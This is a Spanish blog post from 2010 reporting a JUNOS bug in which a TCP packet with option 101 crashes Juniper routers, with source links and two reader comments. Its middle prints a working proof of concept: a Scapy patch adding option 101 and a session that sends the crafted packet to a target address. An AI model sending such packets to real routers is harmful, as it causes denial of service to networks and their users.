martes, 26 de enero de 2010

Increíble Bug en JUNOS

Con todo el mundo hablando sobre la "Operación Aurora", hay muchas otras cosas que pasan totalmente desapercibidas, como este increíble bug en JUNOS.

Cuesta creer que enviando un simple paquete con la opción 101 de TCP activada, un router de Juniper pueda crashear. Pueden ver un video del blog evilrouters.net a continuación, y también les recomiendo ver Praetorian Prefect, otro blog que escribió bastante al respecto:



El código es muy fácil de reproducir con Scapy, para este ejemplo de evilrouters.net simplemente hay que agregar dos lineas en el archivo inet.py, pero hay muchas formas de hacerlo:

$ diff inet.py inet.py.bak
203,204c203
<                 15 : ("AltChkSumOpt",None),
<                 101 : ("JunOS",None)
---
>                 15 : ("AltChkSumOpt",None)
215d213
<                 "JunOS":101
$

$ sudo scapy
Welcome to Scapy (2.1.0)
>>> p=IP(dst='192.168.1.61')/TCP(dport=23,flags='S',options=[('JunOS', '')])
>>> send(p)
.
Sent 1 packets.
>>>

FUENTES:

- OSVDB: JUNOS kernel cores when it receives an crafted TCP option. - praetorianprefect: Juniper Kernel Crash – scapy Code
- praetorianprefect: JUNOS (Juniper) Kernel Crash Video
- praetorianprefect: JUNOS (Juniper) Flaw Exposes Core Routers to Kernel Crash
- evilrouters: Use scapy to send JunOS killin’ packet
- evilrouters: JunOS PSN-2010-01-623 Exploit

2 comentarios:

Txalin dijo...

Increible 0_o

OldPhreaking dijo...

Che pa esto es un Bug a proposito... es demasiado Guarango.....o sea te puede escapar la tortuga pero de adentro el balde y con tapa ... mmmmmmm pa mi que algun "coder" mal pagado :P

LinkWithin